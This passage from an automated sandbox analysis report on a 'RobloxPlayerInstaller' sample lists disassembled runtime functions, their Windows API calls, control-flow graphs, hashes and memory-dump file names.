                                                                                                                  • Associated: 00000004.00000002.1511411663.00000000012D0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511445112.00000000012D8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001389000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001466000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000146C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001472000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000152B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000157C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000015CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000161F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001670000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000016C1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001712000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001763000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000017B4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001805000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001856000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000194A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000199B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001EFE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F3E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F41000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1991824761-0
                                                                                                                  • Opcode ID: 73739d5754babbd4688407685b059e660e9cd9735eb6f9b17e1855572533f0d5
                                                                                                                  • Instruction ID: 3e42a1571124b693fb1e17e141bab45d6bf25e5d98cd7cbe809b15ad1f6e0d9d
                                                                                                                  • Opcode Fuzzy Hash: 73739d5754babbd4688407685b059e660e9cd9735eb6f9b17e1855572533f0d5
                                                                                                                  • Instruction Fuzzy Hash: A3F03A304006016BEF75AB69C80DA5B3ED9AF00A64B0847A8BEA5CBDA5CBB0D9818650
                                                                                                                  Function 0110437B Relevance: 4.5, APIs: 3, Instructions: 15COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(00000002,?,01104375,010F466F,010F466F,?,00000002,5791E0C7,010F466F,00000002), ref: 0110438C
                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,01104375,010F466F,010F466F,?,00000002,5791E0C7,010F466F,00000002), ref: 01104393
                                                                                                                  • ExitProcess.KERNEL32 ref: 011043A5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.1510920727.0000000000DF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511333085.0000000001220000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511358587.0000000001224000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511411663.00000000012D0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511445112.00000000012D8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001389000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001466000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000146C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001472000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000152B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000157C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000015CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000161F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001670000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000016C1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001712000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001763000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000017B4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001805000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001856000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000194A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000199B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001EFE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F3E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F41000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1703294689-0
                                                                                                                  • Opcode ID: 8e81de79567502aa6ef6ab9844a7750c14a6f2053c98657547ce25b67fa5ec76
                                                                                                                  • Instruction ID: 5c62ff90ef29fcaad2db3909151f440c8acf05d3bf9baab07b6619d1a8e7200f
                                                                                                                  • Opcode Fuzzy Hash: 8e81de79567502aa6ef6ab9844a7750c14a6f2053c98657547ce25b67fa5ec76
                                                                                                                  • Instruction Fuzzy Hash: ECD09E71404618AFCF1A2FA1D84D9593F25AF402457145124BB194E569CBB199D1DB90
                                                                                                                  Function 0110A4B0 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 61 110a4b0-110a4b9 62 110a4e8-110a4e9 61->62 63 110a4bb-110a4ce RtlFreeHeap 61->63 63->62 64 110a4d0-110a4e7 GetLastError call 10ee5d5 call 10ee672 63->64 64->62
                                                                                                                  APIs
                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,01112F19,?,00000000,?,?,011131BA,?,00000007,?,?,01113665,?,?), ref: 0110A4C6
                                                                                                                  • GetLastError.KERNEL32(?,?,01112F19,?,00000000,?,?,011131BA,?,00000007,?,?,01113665,?,?), ref: 0110A4D1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.1510920727.0000000000DF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511333085.0000000001220000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511358587.0000000001224000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511411663.00000000012D0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511445112.00000000012D8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001389000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001466000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000146C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001472000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000152B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000157C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000015CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000161F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001670000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000016C1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001712000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001763000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000017B4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001805000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001856000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000194A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000199B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001EFE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F3E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F41000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 485612231-0
                                                                                                                  • Opcode ID: d59e4f959c2e5bb50b3aee5204a1ddfcea237bdf52626abc148c884e88133142
                                                                                                                  • Instruction ID: 5efd00955fe6fa1788f0180d03a4b9c2f98dab16f0dd7c518ea2483e70cbae64
                                                                                                                  • Opcode Fuzzy Hash: d59e4f959c2e5bb50b3aee5204a1ddfcea237bdf52626abc148c884e88133142
                                                                                                                  • Instruction Fuzzy Hash: 6FE08C32500208AFDF3A2BA9FC0CB893BA8AF50792F054031F608C60A4DBB485808B90
                                                                                                                  Function 0110A1C5 Relevance: 2.6, APIs: 2, Instructions: 125COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,010F4464,0121C1C8,0000000C), ref: 0110A1C9
                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 0110A26B
                                                                                                                    • Part of subcall function 0110B99B: RtlAllocateHeap.NTDLL(00000008,?,?,?,0110A212,00000001,00000364,?,00000006,000000FF,?,010F4464,0121C1C8,0000000C), ref: 0110B9DC
                                                                                                                    • Part of subcall function 0110A4B0: RtlFreeHeap.NTDLL(00000000,00000000,?,01112F19,?,00000000,?,?,011131BA,?,00000007,?,?,01113665,?,?), ref: 0110A4C6
                                                                                                                    • Part of subcall function 0110A4B0: GetLastError.KERNEL32(?,?,01112F19,?,00000000,?,?,011131BA,?,00000007,?,?,01113665,?,?), ref: 0110A4D1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.1510920727.0000000000DF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511333085.0000000001220000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511358587.0000000001224000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511411663.00000000012D0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511445112.00000000012D8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001389000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001466000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000146C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001472000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000152B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000157C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000015CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000161F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001670000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000016C1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001712000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001763000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000017B4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001805000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001856000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000194A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000199B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001EFE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F3E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F41000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$Heap$AllocateFree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2037364846-0
                                                                                                                  • Opcode ID: 6d651a32cf2c62565083d49e76b6fc643d17c332c69c3cf3ce4502238ec5f7e7
                                                                                                                  • Instruction ID: 5be218a5e7457c99cf415c79bf4d39189fd539a47b5d102d0ac58e1bce71cbf1
                                                                                                                  • Opcode Fuzzy Hash: 6d651a32cf2c62565083d49e76b6fc643d17c332c69c3cf3ce4502238ec5f7e7
                                                                                                                  • Instruction Fuzzy Hash: 7331C571E0A3226AE62F3A68BC89ABE3A595F616A9B110370FA15970D0DBD1880547E1
                                                                                                                  Function 0110CACA Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 146 110caca-110caf2 147 110caf4-110caf6 146->147 148 110caf8-110cafa 146->148 149 110cb49-110cb4c 147->149 150 110cb00-110cb07 call 110c9ff 148->150 151 110cafc-110cafe 148->151 153 110cb0c-110cb10 150->153 151->149 154 110cb12-110cb20 GetProcAddress 153->154 155 110cb2f-110cb46 153->155 154->155 157 110cb22-110cb2d call 110381c 154->157 156 110cb48 155->156 156->149 157->156
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.1510920727.0000000000DF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511333085.0000000001220000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511358587.0000000001224000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511411663.00000000012D0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511445112.00000000012D8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001389000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001466000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000146C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001472000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000152B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000157C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000015CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000161F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001670000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000016C1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001712000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001763000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000017B4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001805000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001856000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000194A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000199B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001EFE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F3E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F41000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dffec4a226bb8250faf8e0e67f48ab36e1f71260c7501f1a5ae5000accd26eee
                                                                                                                  • Instruction ID: 56e99bd56130a0711d5659e40850ee6c966231d4c304f941dcd04ce9507dd62a
                                                                                                                  • Opcode Fuzzy Hash: dffec4a226bb8250faf8e0e67f48ab36e1f71260c7501f1a5ae5000accd26eee
                                                                                                                  • Instruction Fuzzy Hash: F8019237F046265FEB2F8A6DEC44A5A77AAEB852A07154260F910DB1CCEB7094019BD1
                                                                                                                  Function 0110B99B Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 160 110b99b-110b9a6 161 110b9b4-110b9ba 160->161 162 110b9a8-110b9b2 160->162 163 110b9d3-110b9e4 RtlAllocateHeap 161->163 164 110b9bc-110b9bd 161->164 162->161 165 110b9e8-110b9f3 call 10ee672 162->165 166 110b9e6 163->166 167 110b9bf-110b9c6 call 1109cb0 163->167 164->163 170 110b9f5-110b9f7 165->170 166->170 167->165 173 110b9c8-110b9d1 call 11125ed 167->173 173->163 173->165
                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,?,?,0110A212,00000001,00000364,?,00000006,000000FF,?,010F4464,0121C1C8,0000000C), ref: 0110B9DC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.1510920727.0000000000DF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511333085.0000000001220000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511358587.0000000001224000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511411663.00000000012D0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511445112.00000000012D8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001389000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001466000.00000004.00000001.01000000.00000009.sdmpDownload File
